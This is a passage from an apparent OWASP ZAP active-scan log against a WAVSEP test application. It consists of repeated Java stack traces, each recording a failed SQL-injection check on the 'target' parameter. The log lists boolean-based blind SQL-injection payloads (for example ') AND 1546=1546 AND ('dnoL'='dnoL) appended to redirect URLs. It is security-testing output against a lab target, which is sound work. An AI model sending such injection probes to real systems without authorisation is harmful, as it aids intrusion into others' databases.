org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679192 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 8450=8450 AND (4604=4604] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 8450=8450 AND (4604=4604 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679192 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 9099=9099 AND (3474=3474] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 9099=9099 AND (3474=3474 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679193 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 1978=5695 AND (3997=3997] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 1978=5695 AND (3997=3997 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679194 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 4492=1273 AND (1550=1550] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 4492=1273 AND (1550=1550 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679194 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3959=6890] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3959=6890 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679195 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 9684=1076] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 9684=1076 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679196 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5202=5202] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 5202=5202 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679196 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 5896=5896] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 5896=5896 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679197 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3959=6890] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3959=6890 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679197 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 9684=1076] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 9684=1076 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679198 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5906=6400 AND ('zUcM'='zUcM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 5906=6400 AND ('zUcM'='zUcM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679199 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 8078=5663 AND ('hRWl'='hRWl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 8078=5663 AND ('hRWl'='hRWl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679199 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 1546=1546 AND ('dnoL'='dnoL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 1546=1546 AND ('dnoL'='dnoL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679200 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 3365=3365 AND ('SZSe'='SZSe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 3365=3365 AND ('SZSe'='SZSe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679200 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5906=6400 AND ('zUcM'='zUcM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 